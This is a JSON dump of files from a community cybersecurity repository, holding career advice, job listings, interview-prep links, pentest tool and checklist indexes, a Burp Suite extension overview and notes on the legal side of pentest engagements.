    "content": "**For Job** :\n\n- 1. Understand the domain & choose your goal.\n- 2. Find your mentor.\n- 3. Validate your career and goal with your mentor.\n- 4. Complete a course (free/paid) to intensify learning.\n- 5. Build a project, resume & cover letter.\n- 6. Attend 2 mock interviews: 1 with the community & 1 with your mentor.\n- 7. Apply & get a job.\n\nSimplified steps to get a job.\nIf anyone would like to comment with their point of view or add something, they are most welcome :)\n\nNote : When I say project I mean building something in cybersecurity that actually solves a problem, such as an attack surface management project, a bug bounty tool or automation of your workflow, and not a keylogger.\n\nBy Offensive Security :\n\n- 🔴Build a Strong Resume \n\n  ➡Resume Now: https://resume-now.com/build-resume\n  ➡Novoresume: https://novoresume.com\n  ➡Information Technology resume examples: https://www.jobhero.com/resume/examples/information-technology\n\n- 🔵Interview Prep \n  \n  ➡Tell Me About Yourself: https://youtube.com/watch?v=TQHW7gGjrCQ\n  ➡35 Pentesting Interview Questions (With Sample Answers): https://indeed.com/career-advice/interviewing/pentesting-interview-questions\n  ➡200 IT Security Job Interview Questions via McAfee: https://www.mcafee.com/enterprise/en-us/assets/misc/ms-200-it-security-interview-questions.pdf\n\n- 🟣 YouTube Channels\n  \n  ➡OffSec Live | How to Write a Cybersecurity Resume: https://youtube.com/watch?v=zZSiml6vGO0\n  ➡Resume reviews with Neal Bridges: https://youtube.com/watch?v=wejL0ll__uQ&list=PLqEPHR4iX_BJRT6qDSSNy2sWgbaPlxx1p\n  ➡Infosec Job Hunting with Jason Blanchard: https://youtube.com/playlist?app=d\n\n\n---\n\n2. Find a Mentor :\n  - Stage 1 : Invite-based & selected mentors only.\n  - Stage 2 : Search for your mentor on the platform.\n\n- 3. Validate your career and goal with your mentor.\n**Mentor Questions** :\n\n  If the candidate is ready:\n    - May I know what role you are applying for?\n    - How are you preparing for the interview?\n    - Wait, I'll share something with you that will help.\n    - When you're ready with the interview questions, let me know and I'll arrange a mock interview before the actual interview so you can be prepared and confident.\n\n  If the candidate is not ready:\n    - Can you introduce yourself and tell me about your achievements?\n    - May I know which course you have completed or which certification you hold?\n\n- 4. Complete a course (free/paid) to intensify learning.\n- 5. Build a project, resume & cover letter.\nHappy to help, and take care of yourself.\n\n---\n\n- 6. Attend 1 mock interview with your mentor.\n    - Review the task assigned in the last talk, \"Validate with your mentor\".\n    - Rate the candidate, give a remark & move forward with the mock interview.\n    - Complete the mock interview, give a remark & suggestions on where to apply etc.\n\n---\nCongratulations, you're ready for a job. :)\n\n\n\n=========\n# Breaking into cybersecurity:\n\n- These videos / guides will help you smash your next interview!\n\nTop 30 Penetration Tester Interview Questions / Answers\nhttps://lnkd.in/eAkvQFZG\n\nCyber Security Interview Prep\nhttps://lnkd.in/eky9v_hC\n\nSOC Analyst Interview Questions (LetsDefend)\nhttps://lnkd.in/eqFPGS-Z\n\nGRC Entry-Level Interview Q&A (👉🏼 Gerald Auger, Ph.D.)\nhttps://lnkd.in/eK6uti-W\n\nMastering the Art of the Interview (TEDX Talks / Ashley Rizzotto, M.Ed.)\nhttps://lnkd.in/ecMGM5Tn\n\nTell Me About Yourself - A Good Answer To This Question\nhttps://lnkd.in/eES-wF7Q\n\nHow to Ace a Job Interview: 10 Crucial Tips\nhttps://lnkd.in/e29vxaH9\n\nCybersecurity Interview Preparation Playlist (👉 Jon Good 👈)\nhttps://lnkd.in/ek-x4cPx\n\nHow To Be Confident In Interviews\nhttps://lnkd.in/eGQgXbKJ\n\nHow To Crush Any Interview\nhttps://lnkd.in/eWr2mU57\n\n10 Best Questions to Ask an Interviewer\nhttps://lnkd.in/efMbFn4S\n\nHow to Ace Your Job Interview (David Bombal)\nhttps://lnkd.in/eKyqWpCU\n\nCybersecurity Practice Interview Questions Playlist (Josh Madakor)\nhttps://lnkd.in/eqw-Z-tD\n\nHow to Prepare for a Cyber Security Interview (Cyberspatial)\nhttps://lnkd.in/eTzegN6G\n\nHow to Fail a Cybersecurity Interview (Cyberspatial)\nhttps://lnkd.in/eu_KyAf2\n\n"
  },
  {
    "path": "CyberSecurityJobs/Intership_Advice.md",
    "content": "## 1. Internship \n[Advice by iamthefrogy](https://github.com/iamthefrogy)\n  \n  Shall I go for an internship in any company after my studies?\n  \n  Will it be helpful in my career?\n  \n  What kind of internships do companies provide?\n  \n  Is it necessary to do it at a renowned company, or will any company do?\n\n\nThe answer to this question is too broad. It depends on many factors, such as:\n \n  • Which company is providing the Internship (Product-based company, security consulting company, Big4, etc.)?\n\n  • What are their requirements for internship programs?\n\n  • What will be the job roles and responsibilities during the internship?\n\n  • What are the employer's expectations?\n\nThere are very few, I would say only a handful of, companies that provide quality internships where you would learn valuable things. \nMost of the money-making companies are running CEH (Certified Ethical Hacker – which is the official certification from EC-Council, a well-reputed cybersecurity certification authority) and related courses in the name of an internship. \nFor example, if my company's name is Prakash, then I will provide my own CEH certification in the name of \"PCEH – Prakash Certified Ethical Hacker\" and so on.\n\n- So, I have prepared a 'DO' and 'DON'T' list for selecting a company for your internship.\n\n\n## DO\n\n    • Understand the nature of the company (consulting, product-based, small, big, etc.).\n\n    • Ask them about your daily responsibilities, tasks, and job routines.\n\n    • Ask them what learning options they can provide to you during your internship.\n\n    • Ask them what their expectations from you during the internship will be.\n\n    • Ask more and more people around for reviews of the companies you are evaluating for internships.\n\n    • Identify your career interests. This could be done by self-reflection, or by speaking with a Career Counsellor or your mentor.\n\n    • Ask the company about paid or unpaid Internships. You can go for either, as long as the other criteria are met.\n\n    • Start searching for an internship at least 6 months prior.\n\n    • If you are interested in a company and can't find any internship opportunity, check their website and social media. Connect to their HRs via LinkedIn and ask the same.\n\n    • Better understand and research who they are, what they do, and their strengths and weaknesses.\n\n    • Perform at least 5 mock interviews with your career counsellor or mentor before going for an internship interview.\n\n\n## DON'T\n\n    • Don't select a company that just provides course teaching or coaching.\n\n    • Don't select a company that does not serve any clients, or serves only a handful of clients with simple projects.\n\n    • Don't select a company that asks you to teach their students via their coaching or training programs.\n\n    • Don't get attracted by any company's marketing & PR success.\n\n    • Don't get attracted by a company's reputation built through magazines, press, or awards from random conferences or panels.\n\n    • Don't select a company where only 4/5 people are working and all are Founders, Co-Founders, or Directors. If you do, please check their professional background. Check whether they obtained these titles without having any prior corporate experience, or started their start-ups after having at least 8 years of experience in the industry.\n"
  },
  {
    "path": "CyberSecurityJobs/InterviewQA.md",
    "content": "0. All for one - interview questions - https://drive.google.com/drive/folders/17Brt0bx__E5Dd7PeR_09wPylidpDFZ7M?usp=sharing\n\n1. [83 Basics Hacking Question Answers](https://www.besanttechnologies.com/ethical-hacking-interview-questions-and-answers#) \n\n2. [SOC Analyst (Cybersecurity) Interview Questions and Answers - Udemy Anand Guru]()\n\n3. [60 Cybersecurity Interview Questions](https://danielmiessler.com/study/infosec_interview_questions/)\n\n4. [Security Engineer Interview Questions](https://github.com/tadwhitaker/Security_Engineer_Interview_Questions/blob/master/security-interview-questions.md)\n5. [Security Engineer Interview Questions](https://gist.github.com/boodera/f216ac8c0ca6eb291e09b2e3cf19b3fd)\n6. [Security Engineer Interview Questions, Quiz etc](https://github.com/justinltodd/security-interview-questions)\n7. [Security Engineer Interview Tips](https://github.com/jigerjain/Interview_Tips)\n8. [Infosec interview Questions](https://github.com/pbnj/infosec-interview-questions)\n9. [Security Engineer Interview Questions and Engineering interview questions](https://github.com/paulveillard/cybersecurity-interview-questions#security)\n10. [Top 50 Interview Questions & Answers | Penetration Testing - Updated 2022](https://allabouttesting.org/interview-questions-answers-penetration-testing/)\n11. [Penetration Testing Interview Questions Cheat Sheet](https://allabouttesting.org/interview-questions-answers-penetration-testing/)\n12. [*Penetration Testing Interview Questions Cheat Sheet by Stefano Lanaro](https://steflan-security.com/penetration-testing-interview-questions-cheat-sheet/)\n\n13. 
[🧵Resources for a Successful #Cybersecurity Job Hunt🧵 by Offensive Security]\n\n\n- 🔴Build a Strong Resume \n\n  ➡Resume Now: https://resume-now.com/build-resume\n  ➡Novoresume: https://novoresume.com\n  ➡Information Technology resume examples: https://www.jobhero.com/resume/examples/information-technology\n\n- 🔵Interview Prep \n  \n  ➡Tell Me About Yourself: https://youtube.com/watch?v=TQHW7gGjrCQ\n  ➡35 Pentesting Interview Questions (With Sample Answers): https://indeed.com/career-advice/interviewing/pentesting-interview-questions\n  ➡200 IT Security Job Interview Questions via McAfee: https://www.mcafee.com/enterprise/en-us/assets/misc/ms-200-it-security-interview-questions.pdf\n\n- 🟣 YouTube Channels\n  \n  ➡OffSec Live | How to Write a Cybersecurity Resume: https://youtube.com/watch?v=zZSiml6vGO0\n  ➡Resume reviews with Neal Bridges:https://youtube.com/watch?v=wejL0ll__uQ&list=PLqEPHR4iX_BJRT6qDSSNy2sWgbaPlxx1p\n  ➡Infosec Job Hunting with Jason Blanchard: https://youtube.com/playlist?app=d\n"
  },
  {
    "path": "CyberSecurityJobs/Jobs.md",
    "content": "## Table of Contents for Jobs\n\n- [0. Weekly Cybersecurity Hiring](#0-weekly-cybersecurity-hiring-october-2022)\n- [1. Types of Company](#1-types-of-company)\n- [2. Types of High Paying Jobs & responsibilities](#2-types-of-high-paying-jobs--responsibilities)\n- [3. IT COMPANY offer Jobs](#3-it-company-offer-jobs)\n- [4. Cybersecurity jobs at Startups](#4-cybersecurity-jobs-at-startups)\n- [5. Remote Jobs Search portal](#5-remote-jobs-search-portal)\n- [6. Apply Jobs at Startups for everyone](https://www.ycombinator.com/topcompanies)\n--------------------------------------------------\n## **0. Weekly Cybersecurity Hiring October 2022**\n\nIf you're looking for new opportunities then do check this out. We update the job openings every week.\n\n- [ACCEIS](https://www.acceis.fr/), a French cybersecurity company, is looking for experienced [**pentesters**](https://www.acceis.fr/nos-offres-demploi/auditeur-en-cybersecurite/). The job is based in Rennes, France 🇫🇷 (hybrid remote, French citizenship required). [Other positions](https://www.acceis.fr/nos-offres-demploi/) are available too.\n\n## **0. Weekly Cybersecurity Hiring September 2022**\n\n- After the recent Data Breach, [Uber opened multiple positions for Senior Security Engineer roles at\nMultiple Locations](https://www.uber.com/in/en/careers/list/?query=security)\n- Cyware has some [remote job Openings for you](https://cyware.com/careers)\n- Browse the jobs ReturnOnSecurity.com curates and [apply for what matches your interests.](https://returnonsecurity.pallet.com/jobs)\n- Multiple Job openings at [\"forgepointcap\"](https://jobs.forgepointcap.com/jobs)\n- [Karl Sharman curated the latest cybersecurity jobs](https://www.linkedin.com/feed/update/urn:li:activity:6891791435532775424/). All roles are based remotely in the US unless otherwise stated, and all salaries are base only. If you are interested, you can discuss via karl.sharman@stottandmay.com.\n\n## **0. Weekly Cybersecurity Hiring Aug 2022**\n\n **Week 01-05 Hiring - August 2022**\n- [Cybersecurity-NxxT hiring Security Intern](https://www.linkedin.com/posts/itsaftab_cybersecurity-internship-activity-6941036757408710657-Ld5G)\n- [Q3 2022 Information security hiring](https://www.reddit.com/r/netsec/comments/w25lkc/rnetsecs_q3_2022_information_security_hiring/)\n- [HCL campus Hiring - NOIDA(INDIA)](https://forms.office.com/r/TUPAWePirU)\n- [Jumio is hiring for 2-3 YoE security engineer](https://jobs.jobvite.com/jumio-corporation/job/oIqxkfwJ)\n- Pentesters Hiring - Trivandrum/Kochi (INDIA) - Send resume to rawal.p@spectral.in\n- Security Engineer/Sr Security Engineer for Appsec, GRC, Cyber Defense, Data Protection & Infosec roles (Experience ranging from 3 to 9 years. Location - Bangalore). If you are interested in exploring any of these opportunities, please reach out to babitha.s@flipkart.com & chandana.c@flipkart.com for more details.\n- Twitter has new openings for Infosec. Please go to https://twitter.com/career\n\n## 1. Types of Company\n\n[Credit iamthefrogy](https://github.com/iamthefrogy)\n\n1. How many different types of Companies are there?\n2. Which types of Companies should you choose early in your career?\n\n![type of company](https://user-images.githubusercontent.com/25515871/176593421-6e5c2db1-80cc-42c7-afe9-9108a3bc8850.png)\n\n## 2. Types of High Paying Jobs & responsibilities\n[Credit iamthefrogy](https://github.com/iamthefrogy)\n\n![jobs   responsibility ](https://user-images.githubusercontent.com/25515871/176593433-716d93e0-5bd1-401d-b598-f723cf9147c9.png)\n\n----------------------------------------------------------------------------------\n\n## 3. IT COMPANY offer Jobs\n\nIndex | Websites\n-- | --\nCisco | (https://jobs.cisco.com/jobs/SearchJobs/security?21178=%5B207928%5D&21178_format=6020&listFilterMode=1)\nDeloitte | (https://jobsindia.deloitte.com/)\nSisainfosec | [Provides cybersecurity services to almost all the series startups in India](https://www.sisainfosec.com/careers/)\nIBM | (https://www.ibm.com/in-en/employment/)\nOracle | (https://eeho.fa.us2.oraclecloud.com/hcmUI/CandidateExperience/en/sites/CX_1/requisitions?location=India&locationId=300000000106947&locationLevel=country)\nJuniper Networks | (https://careers.juniper.net/#/)\nMcAfee | (https://careers.mcafee.com/location/india-jobs/731/1269750/2)\nSynopsys | (https://www.synopsys.com/careers/global/south-asia/india.html)\nCloudSEK | (https://cloudsek.com/openings/)\nSentinelOne | [Planning to invest $50 million in India](https://www.sentinelone.com/careers/)\nCyberArk | (https://careers.cyberark.com/)\nCyraacs | (https://cyraacs.com/careers/)\nK7 Computing Pvt. Ltd | (https://careers.k7computing.com/)\nBugcrowd | (https://www.bugcrowd.com/about/careers/?gh_jid=676938#openings)\nHackerOne | (https://www.hackerone.com/careers)\nIntigriti | (https://careers.intigriti.com/)\nYesWeHack | (https://jobs.yeswehack.com/en/)\nRedTeam Hacker Academy Pvt. Ltd. | (https://redteamacademy.com/careers/)\nFireCompass | (https://www.firecompass.com/careers/)\nAppSecure | (https://www.linkedin.com/company/appsecuresecurity/?originalSubdomain=in)\nPentabug by AppSecure | (https://www.linkedin.com/company/pentabug/)\n*Qualys - Pune opening | (https://www.qualys.com/careers/?p=search&q=research)\n*Tenable - Attack surface management | (https://careers.tenable.com/search/jobs) \nMore than 120 Companies in Cybersecurity | (https://cybersecurityventures.com/cybersecurity-companies-list-hot-150/#hot-150/?view_15_per_page=150&view_15_page=1)\n\n\nNOTE: For companies such as IBM, Meta, Amazon, Netflix, Alphabet, etc., we recommend applying through a referral only.\nE.g. with a referral you can attempt the Alphabet Interview thrice in a month if your resume gets selected.\n\n## 4. Cybersecurity jobs at Startups\n- [Cybersecurity jobs at Startups](https://www.ycombinator.com/companies?query=cybersecurity)\n\n## 5. Remote Jobs Search portal\n- Here are 14 websites to find remote cybersecurity and tech jobs:\n\nIndex | Websites\n-- | --\n1. | Hired\n2. | Flex Jobs\n3. | Jobspresso\n4. | Remote OK\n5. | Just Remote\n6. | JS Remotely\n7. | Daily Remote\n8. | Remote Leaf\n9. | Remote Work\n10. | Remote Leads\n11. | AngelList Talent\n12. | Working Nomads\n13. | Product Hunt Jobs\n14. | We Work Remotely\n\nIndex | Websites\n-- | --\n-> | (https://remoteok.com)\n-> | (https://showwcase.com)\n-> | (https://remotive.io)\n-> | (https://remoteglobal.com)\n-> | (https://devsnap.io)\n-> | (https://workingnomads.co)\n-> | (https://triplebyte.com)\n-> | (https://nodes.co)\n-> | (https://epicjobs.co)\n-> | (https://remotehunt.com)\n-> | (https://weworkremotely.com)\n-> | (https://flexjobs.com)\n\n## 6. [Apply Jobs at Startups for everyone](https://www.ycombinator.com/topcompanies)\n"
  },
  {
    "path": "CyberSecurityJobs/Readme.md",
    "content": "Welcome to the [RESETHACKER Community](https://github.com/RESETHACKER-COMMUNITY/What-Is-RESETHACKER) :)\n\n[![IT Job Helpdesk](https://img.shields.io/badge/-IT_Job_HelpDesk-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-IT_JobHelpDesk) \n[![Advice for cybersecurity Jobs](https://img.shields.io/badge/-Resources_for_Cybersecurity_Jobs-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-Advice) \n[![Cybersecurity Domain v2 ](https://img.shields.io/badge/-Cybersecurity_Domain-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-Cybersecurity_Domain) \n\nFor a **Job**👨‍💼🧑‍💼 :\n\n- Understand the domain & choose your Goal.\n- Find your Mentor.\n- Validate your Career and Goal with your Mentor.\n- Complete the course (Free/paid) to intensify learning.\n- Build a Project, Resume & Cover letter.\n- Attend 2 Mock interviews: 1 with the Community & 1 with your Mentor.\n- Apply & Get a Job.\n\n---\n![Cybersecurity Disciplines and jobs](https://user-images.githubusercontent.com/25515871/180645636-0114e9ef-b3af-4fc6-88ff-ed4ccdcba52a.png)\n\n---\n<span id=\"title-IT_JobHelpDesk\"></span>\n## 1. IT Job Helpdesk\nIndex | Topics\n---|---\n**0** | [Resume and cover letter template](https://drive.google.com/drive/folders/1U2h882fksjfojdmcvPAeY-8TEZ1E3Oci?usp=sharing) & [Cover letter example](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/CoverLetter.md)\n**0** | [CyberSecurity Mentorship](https://cybermentordojo.com/)\n**1** | [Watch technical mock interviews with engineers from Google, Amazon, and more](https://interviewing.io/recordings/)\n**2** | [Internship Openings](https://github.com/paralax/awesome-cybersecurity-internships)\n**3** | [Job Search](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Jobs.md)\n**4** | [Roles/disciplines that best fit your abilities, experience, and interests in a cybersecurity career](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/CybersecuityDiscipline.md)\n\n\n<span id=\"title-Advice\"></span>\n## 2. Advice and more for cybersecurity Jobs\nIndex | JobsHelpDesk\n---|---\n**0** Cyber Career Pathways Tool | [Understand the Role & responsibility of Positions](https://niccs.cisa.gov/workforce-development/cyber-career-pathways-tool)\n**0** SANS | [Popular Cybersecurity Positions in 2022](https://www.sans.org/cybersecurity-careers/20-coolest-cyber-security-careers/)\n**1** Iamthefrogy | [Resume Advice](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/resume.md)\n**2** Iamthefrogy | [Internship Advice](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Intership_Advice.md)\n**3** PentesterLab | [The interview for entry level cybersecurity Jobs](https://blog.pentesterlab.com/the-interview-9706357fd532)\n**3** Cisco | [Job Searching & Interviewing](https://blogs.cisco.com/security/the-more-you-know-job-searching-interviewing)\n**4** Jhaddix | [A hacker's guide to FINDING cybersecurity jobs](https://www.jhaddix.com/post/a-hackers-guide-to-finding-cybersecurity-jobs)\n**5** Placement Materials - Ankush Banik | [Aptitude solutions, Coding round and HR round](https://drive.google.com/drive/folders/1SkCOcAS0Kqvuz-MJkkjbFr1GSue6Ms6m)\n**6** Salary Negotiation | [Updating More](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/SalaryNegotiation.md)\n**7** | [Interview Questions for cybersecurity domains](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/InterviewQA.md)\n\n<span id=\"title-Cybersecurity_Domain\"></span>\n### 3. Cybersecurity Domain v2 - by Richard Bejtlich\n    \n    Note : Do check out \"0. Popular Cybersecurity Positions in 2022 by SANS\"\n\n![cybersecurity mindmap](https://user-images.githubusercontent.com/25515871/179057689-e33e9681-55bf-4b31-803b-a1c41d9fadfa.jpg)\n\nNote: The contents inside **RESETHACKER** are to help the community, and all the content belongs to the respective Authors and Team RESETHACKER.\n\n"
  },
  {
    "path": "CyberSecurityJobs/SalaryNegotiation.md",
    "content": "NOTE: The percentage of people who don't negotiate their salary is very high, but if everything goes really smoothly then you should negotiate it.\n\nFor Salary negotiation: After hearing the offer from HR, just maintain silence for 10-15 sec, or it will be best if HR says something first. \nThen thank them and always ask for at least 10% more than the offered salary, or based on the market value or your expected salary.\n\n-> HR says NO or makes an excuse (Don't worry)\nI was expecting b/w 12 Lakhs to 15 Lakhs. (give them a hint)\n\n-> If HR still says No then \nAsk for a Sign-on bonus:\n\"Do you have a **Sign-on bonus**? That will help me a lot and it'll close the gap between the offered salary and my expected salary.\"\n\n-> Still No, or you already have an offer \nSpeak clearly about what you want, and tell them about the other offer.\n\n-> Still no, then \nGive them time or ask for a time period.\n\nYou'll meet in the middle for sure, or maybe you'll get your expected salary.\n\n\nUpdating More Soon .......\n"
  },
  {
    "path": "CyberSecurityJobs/internships.md",
    "content": "[Cybersecurity internship for Women](https://www.dsci.in/cyber-shikshaa/)\n"
  },
  {
    "path": "CyberSecurityJobs/resume.md",
    "content": "Index | Topics\n-- | --\n**1** | Resume Writing & Advice\n**2** | LinkedIn – Why create a quality profile?\n\n\n## 1. Resume Writing & Advice – How not to blunder?\n[Credit:iamthefrogy](https://github.com/iamthefrogy)\n\nDo you want to break into cybersecurity but don't have the experience to show on your resume?\n\nNo worries.\n\nHere are ten great resume-building activities that will make you stand out from the competition: (Thanks to Naomi Buckwalter for compiling this list -\nhttps://www.linkedin.com/in/naomi-buckwalter/)\n1. Volunteer with a cybersecurity conference\n2. Teach a cybersecurity class\n3. Mentor a student\n4. Join a cybersecurity working group\n5. Contribute to an open-source project\n6. Build a home lab\n7. Start a blog\n8. Guest on a podcast\n9. Lead a study group\n10. Start a cybersecurity meetup or club\n11. Get a basic CEH, Security+ or equivalent cert\n12. AWS, Azure, GCP, etc. certifications\n13. Find a vulnerability in a reputed website (bug bounty)\n14. Find a zero-day and get a CVE id\nOnce you do the majority of these, you will have a good number of things to showcase in your resume and your Interview.\n\nBelow are some common resume blunders I have seen over the years. **Try to avoid them.**\n![resumebuilder](https://user-images.githubusercontent.com/25515871/176604923-8cfa927d-d165-44f5-942f-64200c7561a1.png)\n\n## 2. LinkedIn Advice – Why create a quality profile?\n[Credit:iamthefrogy](https://github.com/iamthefrogy)\n\nOne question for you: do you want to get noticed by reputable persons in your industry? Then it is a must to create a killer LinkedIn profile. Here are the steps\nto create and maintain a perfect LinkedIn profile.\nHow to create a killer LinkedIn profile\n\n![linkedin advice](https://user-images.githubusercontent.com/25515871/176610220-62a55217-559e-4dfa-8c86-3fdbde41077b.png)\n![linkedin advice 2](https://user-images.githubusercontent.com/25515871/176605919-af655061-8a56-4d34-b165-471ad942e71b.png)\n\n\n## HacktheBox/TryHackme – Why create a quality profile?\nUpdating soon\n\n## HackerOne/Bugcrowd/Intigriti/YesWeHack – Why create a quality profile?\nUpdating soon\n\n## Codechef/Hackerearth etc - Why create a quality profile?\nUpdating soon\n\n\n"
  },
  {
    "path": "ISO-HelpDesk/Readme.md",
    "content": "# ISO HELPDESK\n\n**1** [This article discusses \"NIST Cybersecurity Framework vs ISO 27001/27002 vs NIST 800-53 vs Secure Controls Framework\"](https://www.complianceforge.com/faq/nist-800-53-vs-iso-27002-vs-nist-csf-vs-scf)\n  > It helps you decide which Cybersecurity Framework is right for your Organization.\n"
  },
  {
    "path": "LFI/Lfi.md",
    "content": "\n\nhttps://github.com/g0tmi1k/LFISuite\n"
  },
  {
    "path": "LFI/Lfitools.md",
    "content": "**LFI Tools**\n\n\nIndex | LFI Tools\n---|---\n**1** | [LFISuits](https://github.com/D35m0nd142/LFISuite)\n\n"
  },
  {
    "path": "LFI/Readme.md",
    "content": "**LFI(Local File Inclusion )**\n\n\nIndex | Content\n---|---\n**1** | [LFI Documentation]()\n**2** | [LFI Practice labs]()\n**3** | [LFI Disclosure/Reports/POC]()\n**4** | [LFI Mindmap]()\n**5** | [LFI Tools](/LFI/Lfitools.md)\n**6** | [LFI Ebooks]()\n**7** | [LFI Researchers]()\n**8** | [LFI CVE]() \n\n"
  },
  {
    "path": "Pentesting Cheatsheets/Readme.md",
    "content": "# Pentesting Cheatsheets\n\nAuthor | Title\n-- | --\n**1** I-red Team | [Pentesting Cheatsheets](https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets)\n**2** Chris Dale | [BurpSuite Cheatsheet v1.0](/.PentestingCheatsheets/cheetsheets.md)\n**3** riramar | [Web pentesting Cheatsheet (Intermediate fav)](https://github.com/riramar/Web-Attack-Cheat-Sheet)\n"
  },
  {
    "path": "Pentesting Cheatsheets/cheetsheets.md",
    "content": "# Pentesting Cheatsheets\n\nAuthor | Title\n-- | --\nChris Dale | [BurpSuite Cheatsheet v1.0](Pentesting Cheatsheets/cheetsheets.md)\n\n\n## Hunting for Vulnerabilities with Burp Suite CheatSheet v1.0 :\n \n-**Chris Dale** @chrisadale:- Users can contribute with extensions to aid in the \ndiscovery of vulnerabilities. Be aware of false positives and use your pentesting capabilities to \nensure you fully explore the findings.\n \n-Param Miner \n>Allows high-performance identifying of unlinked \nparameters. Check for unlinked GET and Headers, \nand unlinked POST when applicable.\n\n-Backslash Powered Scanner \n>Will give alerts on interesting transformations of data \nor other interesting things. Often, it will be false positives, but it allows the penetration tester to focus on potential vulnerabilities.\n\n-Software Vulnerability scanner\n>Checks software version numbers against \nvulnhub.com for vulnerabilities.\n\n-HTTP Request Smuggler\n>This is an extension for Burp Suite designed to \nhelp you launch HTTP Request Smuggling \nattacks.\n\n-Active scan++\n>Allows us to find more vulnerabilities in terms of \nsuspicious input transformation, XML input \nhandling, host header attacks and more. \n\n-Retire.js\n>Finds outdated JavaScript and links to the \nrelevant CVE's for your investigations.\n"
  },
  {
    "path": "Pentesting-BugbountyINDEX.md",
    "content": "[ResourcesMindmap](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/ResourcesMindmap.md)\n\nPentesting-Bugbounty:(Readme.md)\n \n                 \tPentesting Sample Reports, timeline, quotation etc > PentestingReports \n                      \n                      (PreEngagement.md  & Readme.md)\n                \n                \tPentesting for Researchers\n                \tBugBounty-HelpDesk > Bugbounty \n                      \n                      (burpsuite.md ,Wordlists.md, Website_inputs_testing.md, Getting_Started_with_Bugbounty & Readme.md)\n                \n                \tCybersecurity Jobs\n                \tCyberSecurity Conferences\n\n  1. Bugbounty > \n                    \n                    burpsuite.md ,\n                    Wordlists.md, \n                    Website_inputs_testing.md, \n                    Getting_Started_with_Bugbounty \n                    & Readme.md)\n  \n  3. BurpSuite > \n        \n                    Assets, \n                    Readme.md ,\n                    protips.md              \n  \n  3. CyberSecurityJobs > Readme.md \n                \n                   Careers\n                   Intership_Advice.md\n                   Readme.md\n                   Remotejobs.md\n                   internships.md\n                   resume.md \n  \n  4. PentestingReports/\n\n                  PreEngagement.md\n                  Readme.md \n                  \n  5. Pentesting_for_Researchers/\n                    \n                  PTplatform.md\n                  Readme.md (PEN TESTERS (INTERNAL AND EXTERNAL - Under Development))\n                     \n4. Bugbountycheetsheet > Readme.md\n      bugbountyplatform.md\n"
  },
  {
    "path": "PentestingChecklist/Readme.md",
    "content": "# Checklist\nAuthor | Checklist\n-- | --\n**1** six2dez | [Pentesting Web checklist](https://six2dez.gitbook.io/pentest-book/others/web-checklist)\n**2** Software Secured | [secure-code-review-checklist](https://github.com/softwaresecured/secure-code-review-checklist)\n**3** Unknown | [WAPT Checklist](https://d.docs.live.net/7f17912d09b5e077/Documents/PEntesting.xlsx)\n**4** Tushar Varma | [WAPT Checklist](https://alike-lantern-72d.notion.site/Web-Application-Penetration-Testing-Checklist-4792d95add7d4ffd85dd50a5f50659c6t)\n**5** Hariprasaanth | [THICK CLIENT PENTESTING CHECKLIST](https://hariprasaanth.notion.site/THICK-CLIENT-PENTESTING-CHECKLIST-35c6803f26eb4c9d89ba7f5fdc901fb0)\n**6** Hariprasaanth | [Web Application PENTESTING CHECKLIST](https://hariprasaanth.notion.site/hariprasaanth/WEB-APPLICATION-PENTESTING-CHECKLIST-0f02d8074b9d4af7b12b8da2d46ac998)\n**7** dafthack | [Cloud pentesting](https://github.com/dafthack/CloudPentestCheatsheets)\n**8** mantisSTS | [A list of web application checks sorted by functionality](https://github.com/MantisSTS/Web-Application-Hacking-List)\n**9** mantisSTS | [iOS Pentesting](https://ios.pentestglobal.com/)\n\n"
  },
  {
    "path": "PentestingReports/PreEngagement.md",
    "content": "# Pre-engagement: \nHelp yourself to get your 1st Pentesting client and prepare yourself for client meeting?\n\n    ## UNDERSTAND THE TARGET:\n    ## Understanding will help you tailor the test and test results\n    ## WHAT IS NEEDED TO TEST?\n    ### TEST TYPES\n    ## SCOPE :\n    ## RULES OF ENGAGMENT\n      ### CAN THINGS GO WRONG? - answer is YES.\n      ### OTHER THINGS TO PLAN (In case you have team of pentesters or running a company)\n    ## LEGAL REQUIRENMENTS FOR PENTESTING:\n    ## Pentest report structure \n    ## If you are the Bringing out the clients for organization\n      ### IF YOU ARE THE REPORT RECIPIENT\n    ## HelpDesk & Reference : \n        ### PPre-engagement interaction (Recommended)\n        ### Executive Reporting tamplate\n        ### Technical Reporting tamplate\n        ### A three-part video series on pen testing by Tim Medin(@timmedin)\n\n## Understanding Pre-enganement:\n\n    Obtained Legal Permission -> Written Permission from persons in authourity. \n    |\n    Rules of Engagement -> Defines the scope of the penetration test.\n    |\n    NDA - > Signed agreement b\\w cleint and provider.\n    |\n    Begin Penetration Testing \n\n![preengagements](https://user-images.githubusercontent.com/25515871/178856364-69087dd6-2458-467d-a3c2-60d2a2fcf464.png)\n\n\n## What are the legal considerations for pentests?\n\nFor pentests, you need to have a contract in place before starting the engagement. 
\nThe contract is often referred to as your get-out-of-jail-free card, but keep in mind \nthat you could still be arrested for performing a pentest even if it's authorized.\n\nSome other key legal considerations are outlined here:\n    \n     *Legal Authority* - Does the client really own the systems and/or applications they want you to test?\n     *Damage Control* - Will the client assume liability for any interruptions or damage that occur as a \n    result of the pentest, or are you responsible?\n     *Hack-back* - What happens when third-party data or services are damaged as a result of the \n    pentest? Who is responsible?\n     *Licensing* - Do you need a private investigator license and Certification (gpen,cept, lpt and private investigator license) to perform a pentest?\n     *Privacy Issues*  - Which jurisdiction will be recognized for the pentest? For example, if you are testing offices in Alabama and Virginia, \n    which state's laws will apply to the engagement?\n     *Data Ownership* - Who owns any new methods or tools that are developed as a result of the pentest engagement?\n     *Duty To Warn* - Is there a duty to warn 